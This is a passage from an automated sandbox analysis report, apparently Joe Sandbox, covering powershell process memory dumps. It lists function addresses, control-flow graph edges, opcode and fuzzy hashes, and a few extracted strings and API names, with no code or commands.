                                                                                                                                                                                                                          • Source File: 00000007.00000002.1616475667.0000000002C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_2c1d000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f54e2060f1d555bf276cdb1d565157adbfe1140ea7ae9bcb1cff0eec6d7111d9
                                                                                                                                                                                                                          • Instruction ID: dc7c58be45e8895bec7d78881727ddb61013bd76dbb06b9bcf958348f8664c2d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f54e2060f1d555bf276cdb1d565157adbfe1140ea7ae9bcb1cff0eec6d7111d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C501F7714043449AE7104A16CCC1B67BFD8EF82625F18C019ED4A0B182C7789941DBF2
                                                                                                                                                                                                                          Function 02C82C06 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.1616847937.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_2c80000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: eac80501c629c25455f7cc1c321760d769f01e401184cd930abf05e677dbb153
                                                                                                                                                                                                                          • Instruction ID: c73747a16a70ab9a4ebf5471d4c4079f5dc23727768204c9a78314555dd829c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eac80501c629c25455f7cc1c321760d769f01e401184cd930abf05e677dbb153
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F03A35A001049FDB05CF9CD890AEEF7B1FF88324F208159E515A72A0C732EC52CB50

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:6.2%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:3
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 21913 8cc7560 21914 8cc75a3 SetThreadToken 21913->21914 21915 8cc75d1 21914->21915

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 04BEB490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 480 4beb490-4beb4a9 481 4beb4ae-4beb7f5 call 4beacbc 480->481 482 4beb4ab 480->482 482->481
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: {YCn^$YCn^
                                                                                                                                                                                                                          • API String ID: 0-3695118941
                                                                                                                                                                                                                          • Opcode ID: 373b3130d8608cccf031b33a380dce65bfb05bb6413563daa58f0a343ff17eed
                                                                                                                                                                                                                          • Instruction ID: 4f9c6930311588ae41eaeefbe007a166922378abc20ec24b5ea96ff7f91261d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 373b3130d8608cccf031b33a380dce65bfb05bb6413563daa58f0a343ff17eed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE919E71B007159BEB19EFF688506AFBBE2EFC4600B04892DD906AB344DF356E058BD5
                                                                                                                                                                                                                          Function 07AD2308 Relevance: 17.8, Strings: 13, Instructions: 1572COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $aal$,Sl$,Sl$Jl$Jl$Jl$Jl$Jl$Jl$Rl$Rl$rl$rl
                                                                                                                                                                                                                          • API String ID: 0-3520819111
                                                                                                                                                                                                                          • Opcode ID: c6f4a1c005997d6e4a3894bf2a67c3730e7e3ae0b3281ffb55477d35891fa988
                                                                                                                                                                                                                          • Instruction ID: 9c3c7748793e182ebeb620cfcbc02c4ee047cb6e264c3d6bf378620ded19311f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6f4a1c005997d6e4a3894bf2a67c3730e7e3ae0b3281ffb55477d35891fa988
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8B22AB1B04306DFDB259F6898017AABBF1BFC6211F14807AD966CB291DB35CD41C7A2
                                                                                                                                                                                                                          Function 08CC7560 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 544 8cc7560-8cc75cf SetThreadToken 546 8cc75d8-8cc75f5 544->546 547 8cc75d1-8cc75d7 544->547 547->546
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1614954774.0000000008CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CC0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_8cc0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: 390532fa626683ddfd4e2908e343cb61f7de3a154a4a5cabe4200cdfcba5b5bb
                                                                                                                                                                                                                          • Instruction ID: 31bd4402f4cf609a9e5c80eaf68c6525b83483063142cbd087bb37540f69e763
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 390532fa626683ddfd4e2908e343cb61f7de3a154a4a5cabe4200cdfcba5b5bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB1136B5D003498FDB10DF9AC884B9EFBF8EF88220F14841AD518A3350C778A944CFA0
                                                                                                                                                                                                                          Function 08CC755E Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 550 8cc755e-8cc759b 551 8cc75a3-8cc75cf SetThreadToken 550->551 552 8cc75d8-8cc75f5 551->552 553 8cc75d1-8cc75d7 551->553 553->552
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1614954774.0000000008CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CC0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_8cc0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: 6487c9338133d6f8c6a21ea3c78cb7a065605fe0ed337452013e05d589e5f531
                                                                                                                                                                                                                          • Instruction ID: c56ad3f8c79469625511a4a02a623291f5f32b0e98ac7bb4b6141f984f3bb8bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6487c9338133d6f8c6a21ea3c78cb7a065605fe0ed337452013e05d589e5f531
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B81125B59002498FDB10DF9AC584BDEFBF4EB88224F14841AE118A7650C778A944CFA0
                                                                                                                                                                                                                          Function 04BEE5B9 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 556 4bee5b9-4bee5ba 557 4bee5bc-4bee5c0 556->557 558 4bee5c4-4bee5cb 556->558 559 4bee622-4bee630 557->559 560 4bee5c2 557->560 561 4bee5cc-4bee602 558->561 562 4bee632 559->562 563 4bee693-4bee6b6 559->563 560->558 560->561 564 4bee63c 562->564 565 4bee634-4bee636 562->565 578 4bee6bc-4bee6d3 563->578 579 4bee73a-4bee753 563->579 569 4bee640-4bee643 564->569 568 4bee638-4bee63a 565->568 565->569 568->564 571 4bee644-4bee689 568->571 569->571 571->563 585 4bee6db-4bee738 578->585 582 4bee75e 579->582 583 4bee755 579->583 584 4bee75f 582->584 583->582 584->584 585->578 585->579
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl
                                                                                                                                                                                                                          • API String ID: 0-143229547
                                                                                                                                                                                                                          • Opcode ID: 68377f42e1d9d712a20a4c14616a9b6f627a42b56242fa011922a0f6765057bd
                                                                                                                                                                                                                          • Instruction ID: f299e644202bafd10a5736d43c7a0317657bcf1c4e9f717c8b9331b778fd61ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68377f42e1d9d712a20a4c14616a9b6f627a42b56242fa011922a0f6765057bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB41AD70A00205DFDB14DFBAD494AAEBBF2FF89305F1881A9D415AB391DB34AD05CB91
                                                                                                                                                                                                                          Function 04BEE610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 593 4bee610-4bee612 594 4bee61c-4bee630 593->594 595 4bee614-4bee61a 593->595 597 4bee632 594->597 598 4bee693-4bee6b6 594->598 595->594 599 4bee63c 597->599 600 4bee634-4bee636 597->600 609 4bee6bc-4bee6d3 598->609 610 4bee73a-4bee753 598->610 603 4bee640-4bee643 599->603 602 4bee638-4bee63a 600->602 600->603 602->599 604 4bee644-4bee689 602->604 603->604 604->598 616 4bee6db-4bee738 609->616 613 4bee75e 610->613 614 4bee755 610->614 615 4bee75f 613->615 614->613 615->615 616->609 616->610
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl
                                                                                                                                                                                                                          • API String ID: 0-143229547
                                                                                                                                                                                                                          • Opcode ID: f44beff4464905cdb1b7f2ab164d4484a9f374fbcc3259afa680f2c2a9495247
                                                                                                                                                                                                                          • Instruction ID: 3878d4fbe6ba43808804fa18338648d0ec6090fabdefa8a1082b2ccfeb9205f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f44beff4464905cdb1b7f2ab164d4484a9f374fbcc3259afa680f2c2a9495247
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B841C070A00205DFDB15DF7AD494AAEBBF2FF89601F1881A9D415AB391DB34BC04CBA1
                                                                                                                                                                                                                          Function 04BEE640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 624 4bee640-4bee6b6 632 4bee6bc-4bee6d3 624->632 633 4bee73a-4bee753 624->633 639 4bee6db-4bee738 632->639 636 4bee75e 633->636 637 4bee755 633->637 638 4bee75f 636->638 637->636 638->638 639->632 639->633
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl
                                                                                                                                                                                                                          • API String ID: 0-143229547
                                                                                                                                                                                                                          • Opcode ID: 71f6fc8d1e4fc04e25b25fcdc372f03d5cada3cbe762a2bbc80a066315c76ab4
                                                                                                                                                                                                                          • Instruction ID: 780ae5a8059de76f92d8535f4a898b49dfa4f79569ccef548a3961ea0a08845d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f6fc8d1e4fc04e25b25fcdc372f03d5cada3cbe762a2bbc80a066315c76ab4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C318D30A00205CFCB14DF7AD494AAEBBF2FF88305F148569D816AB394DB34AD04CBA1
                                                                                                                                                                                                                          Function 04BEDC88 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 647 4bedc88-4bedc8a 648 4bedc8c-4bedc92 647->648 649 4bedc94 647->649 648->649 650 4bedc9c-4bedcad 648->650 651 4bedd0d-4bede36 649->651 652 4bedc96 649->652 659 4bedcaf 650->659 660 4bedcb6-4bedcc8 650->660 654 4bedc98-4bedc9b 652->654 655 4bedca0-4bedcad 652->655 654->650 655->660 661 4bedcae-4bedcaf 655->661 659->660 664 4bedcca call 4bedc88 660->664 665 4bedcca call 4bedce8 660->665 666 4bedcca call 4bedcd9 660->666 661->660 663 4bedcd0-4bedcd3 664->663 665->663 666->663
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: +/Cn^
                                                                                                                                                                                                                          • API String ID: 0-76185464
                                                                                                                                                                                                                          • Opcode ID: f900ce7fbab9fd065cbeb7cbe96562058064ac3cdf5ec29916ca88296a263517
                                                                                                                                                                                                                          • Instruction ID: 8c2dcb3c43956ec2cf77ace8298f1285db41a42dd72c747d13110f8cbe644c0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f900ce7fbab9fd065cbeb7cbe96562058064ac3cdf5ec29916ca88296a263517
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F046362007069FDB1A261BA800AFE7B5EDAC92F230440E7E809CF301EBA0A80156F5
                                                                                                                                                                                                                          Function 04BEDC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 667 4bedc98-4bedcad 670 4bedcaf 667->670 671 4bedcb6 667->671 670->671 672 4bedcbe-4bedcc8 671->672 674 4bedcca call 4bedc88 672->674 675 4bedcca call 4bedce8 672->675 676 4bedcca call 4bedcd9 672->676 673 4bedcd0-4bedcd3 674->673 675->673 676->673
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: +/Cn^
                                                                                                                                                                                                                          • API String ID: 0-76185464
                                                                                                                                                                                                                          • Opcode ID: 6ffe7c4b781d8dc4b2cea584c92a23f5e415dfba9feed7e4855307353047a619
                                                                                                                                                                                                                          • Instruction ID: 78e537c2447db8588c97d3902b01acfb932541a8775c747c26644e42f1544653
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffe7c4b781d8dc4b2cea584c92a23f5e415dfba9feed7e4855307353047a619
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8E08631700711478215671FA40045F76DFDEC55B6314446ED41987340DFA4EC0147D5
                                                                                                                                                                                                                          Function 07AD3CE8 Relevance: .6, Instructions: 599COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 677 7ad3ce8-7ad3d0d 678 7ad3f00-7ad3f08 677->678 679 7ad3d13-7ad3d18 677->679 687 7ad3f0a 678->687 688 7ad3f74-7ad3f79 678->688 680 7ad3d1a-7ad3d20 679->680 681 7ad3d30-7ad3d34 679->681 683 7ad3d24-7ad3d2e 680->683 684 7ad3d22 680->684 685 7ad3d3a-7ad3d3c 681->685 686 7ad3eb0-7ad3eba 681->686 683->681 684->681 691 7ad3d4c 685->691 692 7ad3d3e-7ad3d4a 685->692 689 7ad3ebc-7ad3ec5 686->689 690 7ad3ec8-7ad3ece 686->690 695 7ad3f0c-7ad3f11 687->695 696 7ad3f13-7ad3f4a 687->696 693 7ad3f89 688->693 694 7ad3f7b-7ad3f87 688->694 697 7ad3ed4-7ad3ee0 690->697 698 7ad3ed0-7ad3ed2 690->698 700 7ad3d4e-7ad3d50 691->700 692->700 702 7ad3f8b-7ad3f8d 693->702 694->702 695->696 703 7ad40ce-7ad40d6 696->703 704 7ad3f50-7ad3f55 696->704 705 7ad3ee2-7ad3efd 697->705 698->705 700->686 701 7ad3d56-7ad3d75 700->701 730 7ad3d85 701->730 731 7ad3d77-7ad3d83 701->731 706 7ad4080-7ad408a 702->706 707 7ad3f93-7ad3fb2 702->707 722 7ad40df-7ad4112 703->722 723 7ad40d8-7ad40de 703->723 708 7ad3f6d-7ad3f71 704->708 709 7ad3f57-7ad3f5d 704->709 712 7ad408c-7ad4094 706->712 713 7ad4097-7ad409d 706->713 736 7ad3fb4-7ad3fc0 707->736 737 7ad3fc2 707->737 708->688 708->706 715 7ad3f5f 709->715 716 7ad3f61-7ad3f6b 709->716 718 7ad409f-7ad40a1 713->718 719 7ad40a3-7ad40af 713->719 715->708 716->708 725 7ad40b1-7ad40cb 718->725 719->725 728 7ad4228-7ad4230 722->728 729 7ad4118-7ad411d 722->729 723->722 747 7ad429c 728->747 748 7ad4232 728->748 738 7ad411f-7ad4125 729->738 739 7ad4135-7ad4139 729->739 734 7ad3d87-7ad3d89 730->734 731->734 734->686 741 7ad3d8f-7ad3d96 734->741 742 7ad3fc4-7ad3fc6 736->742 737->742 743 7ad4129-7ad4133 738->743 744 7ad4127 738->744 745 7ad413f-7ad4141 739->745 746 7ad41da-7ad41e4 739->746 741->678 751 7ad3d9c-7ad3da1 741->751 742->706 753 7ad3fcc-7ad4003 742->753 743->739 744->739 754 7ad4151 745->754 755 7ad4143-7ad414f 745->755 749 7ad41e6-7ad41ee 746->749 750 7ad41f1-7ad41f7 746->750 758 7ad423b-7ad425d 748->758 759 7ad4234-7ad423a 748->759 760 7ad41fd-7ad4209 750->760 761 7ad41f9-7ad41fb 750->761 762 7ad3db9-7ad3dc8 751->762 763 7ad3da3-7ad3da9 751->763 798 7ad401d-7ad4024 753->798 799 7ad4005-7ad400b 753->799 756 7ad4153-7ad4155 754->756 755->756 756->746 764 7ad415b-7ad415d 756->764 765 7ad425f-7ad4281 758->765 766 7ad428b-7ad4295 758->766 759->758 767 7ad420b-7ad4225 760->767 761->767 762->686 779 7ad3dce-7ad3dec 762->779 768 7ad3dad-7ad3db7 763->768 769 7ad3dab 763->769 774 7ad415f-7ad4165 764->774 775 7ad4177-7ad417e 764->775 802 7ad42d5-7ad42dc 765->802 803 7ad4283-7ad4288 765->803 771 7ad429f-7ad42a5 766->771 772 7ad4297-7ad429b 766->772 768->762 769->762 780 7ad42ab-7ad42b7 771->780 781 7ad42a7-7ad42a9 771->781 772->747 782 7ad4169-7ad4175 774->782 783 7ad4167 774->783 784 7ad4196-7ad41d7 775->784 785 7ad4180-7ad4186 775->785 779->686 810 7ad3df2-7ad3e17 779->810 788 7ad42b9-7ad42d2 780->788 781->788 782->775 783->775 789 7ad4188 785->789 790 7ad418a-7ad4194 785->790 789->784 790->784 807 7ad403c-7ad407d 798->807 808 7ad4026-7ad402c 798->808 804 7ad400d 799->804 805 7ad400f-7ad401b 799->805 809 7ad42de-7ad42fe 802->809 804->798 805->798 811 7ad402e 808->811 812 7ad4030-7ad403a 808->812 820 7ad432d-7ad434c 809->820 821 7ad4300-7ad4326 809->821 810->686 823 7ad3e1d-7ad3e24 810->823 811->807 812->807 820->809 828 7ad434e-7ad435c 820->828 821->820 826 7ad3e6a-7ad3e9d 823->826 827 7ad3e26-7ad3e41 823->827 850 7ad3ea4-7ad3ead 826->850 834 7ad3e5b-7ad3e5f 827->834 835 7ad3e43-7ad3e49 827->835 831 7ad435e-7ad437b 828->831 832 7ad4395-7ad439f 828->832 846 7ad437d-7ad438f 831->846 847 7ad43e5-7ad43ea 831->847 836 7ad43a8-7ad43ae 832->836 837 7ad43a1-7ad43a5 832->837 845 7ad3e66-7ad3e68 834->845 838 7ad3e4d-7ad3e59 835->838 839 7ad3e4b 835->839 840 7ad43b4-7ad43c0 836->840 841 7ad43b0-7ad43b2 836->841 838->834 839->834 844 7ad43c2-7ad43e2 840->844 841->844 845->850 846->832 847->846
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 62448550f8006aefc6df13bb85c19a924acd8984b8eb7bca4013c9746297757a
                                                                                                                                                                                                                          • Instruction ID: 8008c4f28fb1ec17e8bf60248fe6873023119ce5441a00e334536d96a2efd5ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62448550f8006aefc6df13bb85c19a924acd8984b8eb7bca4013c9746297757a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D126CB1704356CFDB159B6894017AABBB2AFCA211F24C07AD926CF381DB31CD45C792
                                                                                                                                                                                                                          Function 07AD17B8 Relevance: .3, Instructions: 342COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 960 7ad17b8-7ad17da 961 7ad1969-7ad19b5 960->961 962 7ad17e0-7ad17e5 960->962 970 7ad19bb-7ad19c0 961->970 971 7ad1b04-7ad1b0c 961->971 963 7ad17fd-7ad1801 962->963 964 7ad17e7-7ad17ed 962->964 968 7ad1914-7ad191e 963->968 969 7ad1807-7ad180b 963->969 966 7ad17ef 964->966 967 7ad17f1-7ad17fb 964->967 966->963 967->963 972 7ad192c-7ad1932 968->972 973 7ad1920-7ad1929 968->973 974 7ad180d-7ad181e 969->974 975 7ad184b 969->975 976 7ad19d8-7ad19dc 970->976 977 7ad19c2-7ad19c8 970->977 992 7ad1b0e 971->992 993 7ad1b78-7ad1b79 971->993 980 7ad1938-7ad1944 972->980 981 7ad1934-7ad1936 972->981 974->961 994 7ad1824-7ad1829 974->994 978 7ad184d-7ad184f 975->978 987 7ad1ab4-7ad1abe 976->987 988 7ad19e2-7ad19e4 976->988 983 7ad19cc-7ad19d6 977->983 984 7ad19ca 977->984 978->968 985 7ad1855-7ad1859 978->985 986 7ad1946-7ad1966 980->986 981->986 983->976 984->976 985->968 997 7ad185f-7ad1863 985->997 995 7ad1acc-7ad1ad2 987->995 996 7ad1ac0-7ad1ac9 987->996 990 7ad19f4 988->990 991 7ad19e6-7ad19f2 988->991 999 7ad19f6-7ad19f8 990->999 991->999 1000 7ad1b17-7ad1b25 992->1000 1001 7ad1b10-7ad1b15 992->1001 1002 7ad182b-7ad1831 994->1002 1003 7ad1841-7ad1849 994->1003 1005 7ad1ad8-7ad1ae4 995->1005 1006 7ad1ad4-7ad1ad6 995->1006 1007 7ad1865-7ad186e 997->1007 1008 7ad1886 997->1008 999->987 1010 7ad19fe-7ad1a16 999->1010 1011 7ad1b27-7ad1b34 1000->1011 1012 7ad1ab0-7ad1ab1 1000->1012 1001->1000 1013 7ad1835-7ad183f 1002->1013 1014 7ad1833 1002->1014 1003->978 1016 7ad1ae6-7ad1b01 1005->1016 1006->1016 1017 7ad1875-7ad1882 1007->1017 1018 7ad1870-7ad1873 1007->1018 1015 7ad1889-7ad1911 1008->1015 1030 7ad1a18-7ad1a1e 1010->1030 1031 7ad1a30-7ad1a34 1010->1031 1019 7ad1b44 1011->1019 1020 7ad1b36-7ad1b42 1011->1020 1013->1003 1014->1003 1023 7ad1884 1017->1023 1018->1023 1026 7ad1b46-7ad1b48 1019->1026 1020->1026 1023->1015 1032 7ad1b7c-7ad1b86 1026->1032 1033 7ad1b4a-7ad1b50 1026->1033 1034 7ad1a20 1030->1034 1035 7ad1a22-7ad1a2e 1030->1035 1045 7ad1a3a-7ad1a41 1031->1045 1040 7ad1b88-7ad1b8d 1032->1040 1041 7ad1b90-7ad1b96 1032->1041 1037 7ad1b5e-7ad1b77 1033->1037 1038 7ad1b52-7ad1b54 1033->1038 1034->1031 1035->1031 1037->993 1038->1037 1042 7ad1b9c-7ad1ba8 1041->1042 1043 7ad1b98-7ad1b9a 1041->1043 1046 7ad1baa-7ad1bc1 1042->1046 1043->1046 1049 7ad1a48-7ad1aa5 1045->1049 1050 7ad1a43-7ad1a46 1045->1050 1052 7ad1aaa-7ad1aaf 1049->1052 1050->1052 1052->1012
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7a622c078f9f6326e41477f7212163142076784ed88820891315c75a1793511b
                                                                                                                                                                                                                          • Instruction ID: 6f495f4ac850ddb68ba663a39812db1f36404f08bc7da50d30aea8252eec5b40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a622c078f9f6326e41477f7212163142076784ed88820891315c75a1793511b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FB128B1B0021ADFDB159B69D4007AABBF2EFC6211F15C07AE426CB251DB31DD51C7A1
                                                                                                                                                                                                                          Function 04BE29F0 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
